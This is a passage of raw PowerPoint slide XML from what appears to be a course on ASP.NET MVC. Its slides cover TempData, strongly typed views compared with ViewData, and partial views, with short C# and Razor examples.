              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for all the Action methods calls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privacy could raise an exception.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>TempData.Peek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>TempData.Keep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to retain values </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for next request.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C0AC8D4-6E32-40DE-A4DF-4A0DD8CBFC52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="816562"/>
            <a:ext cx="5210199" cy="5224876"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1384679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Strongly Typed Views</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strongly typed to the type TModel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contains Model property</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enables compile time code checking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753036" y="3429000"/>
            <a:ext cx="3890682" cy="2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Controller</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B05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public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ActionResult Detail() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> View(person);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>View</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> App.Models.Person</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>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Model.Name </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>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Model.Age</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6167718" y="3429000"/>
            <a:ext cx="3890682" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Controller</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B05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public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ActionResult Detail() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> View();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>View</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>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ViewData[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Name"</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00"/>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ViewData[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Age"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5197737" y="4253785"/>
            <a:ext cx="512781" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vs.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753036" y="2971800"/>
            <a:ext cx="3890682" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strongly Typed View</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6167718" y="3032125"/>
            <a:ext cx="3890682" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Standard View</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1364611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View</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{026CCAEB-CB17-44EB-A892-4553F1D666B6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reusable component filled with content and code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Theoretically plays the same role as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>web controls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in ASP.NET web pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful in various scenarios:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logon dialog box</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time widget to display time on all views of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be rendered inside layout or regular views</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses ViewData and ViewBag to share data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Partial view render:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342924" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>div</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Html.Partial(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"_FeaturedProduct"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342924" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>div</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3550622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Partial View (continued)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6067658" y="3590693"/>
            <a:ext cx="4981342" cy="933450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Bent-Up Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5943600" y="2686971"/>
            <a:ext cx="2285831" cy="736451"/>
          </a:xfrm>
          <a:prstGeom prst="bentUpArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 50000"/>
              <a:gd name="adj3" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="129038">
              <a:lumMod val="75000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
